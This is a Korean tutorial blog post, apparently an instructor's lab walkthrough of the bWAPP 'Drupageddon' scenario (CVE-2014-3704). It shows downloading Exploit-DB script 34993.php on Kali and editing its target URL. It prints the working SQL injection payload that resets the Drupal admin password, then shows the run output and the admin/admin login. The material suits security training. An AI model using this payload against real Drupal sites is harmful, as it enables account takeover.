정보보안(구버전)/ bWAPP 2019. 2. 1. 17:36

웹 해킹 bWAPP - 19. A1 - Injection - SQL Injection(Drupageddon)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

1. Injection

 

 - OWASP Top10 A1 - 악의적인 명령 삽입
 - 서버로 전송되는 요청 정보에 악의적인 명령을 삽입하여 불필요한 동작을 실시하거나, 서버/시스템/DB 중요 정보를

   획득할 수 있는 취약점이다.
 - Ex) HTML 인젝션, SQL 인젝션, PHP 인젝션, XML 인젝션

 

 

 

2. Exploit-DB 사이트

 

 - 주소 : http://www.exploit-db.com

 - 프로그램, 운영체제, 데이터베이스, 전송 및 보안 장비/운영체제에 대한 취약점 분석 코드 제공

 - Zero Day 공격 기간 이후 해결 방안을 제시하는 취약점 코드 및 공격 코드 제공

 - Kali Linux에는 exploit-db에서 제공하는 취약점 코드들이 내장되어 있음

 

 

 

3. Drupal

 

 - [위키 백과 참조]

 - PHP로 작성된 오픈 소스 콘텐츠 관리 프레임워크, 콘텐츠 관리 시스템, 블로그 엔진이다. 처음에는 게시판으로

   만들었으나 여러 가지 유용한 기능을 추가하여 현재의 모습을 가지게 되었다.


 - 7.32 이전의 Drupal 코어 7.x의 데이터베이스 추상화 API에있는 expandArguments 함수는 준비된 문을 올바르게

   구성하지 않아 원격 공격자가 만들어진 키가있는 배열을 통해 SQL 인젝션 공격이 가능하다.

 

 - CVE-2014-3704 취약점 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704

 

 

 

 

4. Injection - SQL Injection(Drupageddon)

 

 - 이 시나리오는 SQL 인젝션을 실시하여 Drupal를 사용하는 웹페이지 ID/PASS를 획득하는 내용이다.

 

 

Ex1) Injection - SQL Injection(Drupageddon) 이해

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

'Drupal' 클릭하면 Drupageddon 페이지가 열림

 

 

 

'Drupageddon' 로그인 페이지

 

 

 

 

'CVE-2014-3704'를 클릭하면 Expolit-DB 링크 사이트가 열림

 

 

 

'EXPLOIT-DB:34993' 취약점 링크 클릭

 

 

 

 

취약점 소스 코드 다운로드 실시

 

 

 

'파일 저장' 선택 -> '확인' 버튼 클릭

 

 

 

root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
34993.php

 

 

'Drupageddon' URL 주소 확인


 

 

root@kali:~/Downloads# vi 34993.php

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#

 

$url = 'http://192.168.20.205/drupal/';  <- 기본 주소를 'Drupageddon' URL 주소로 변경한다.
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 

 

~ 중간 생략 ~

 

:wq!

 

 

 

'34993.php' 실행

root@kali:~/Downloads# php 34993.php
Success! Log in with username "admin" and password "admin" at

 

http://192.168.20.205/drupal/user/loginroot@kali:~/Downloads#

 

 

 

'admin/admin'으로 접속 실시

 

 

 

로그인 확인

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


웹해킹 19. bWAPP Injection - SQL Injection(Drupageddon)   https://youtu.be/NLzOoSxSSyE

 

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q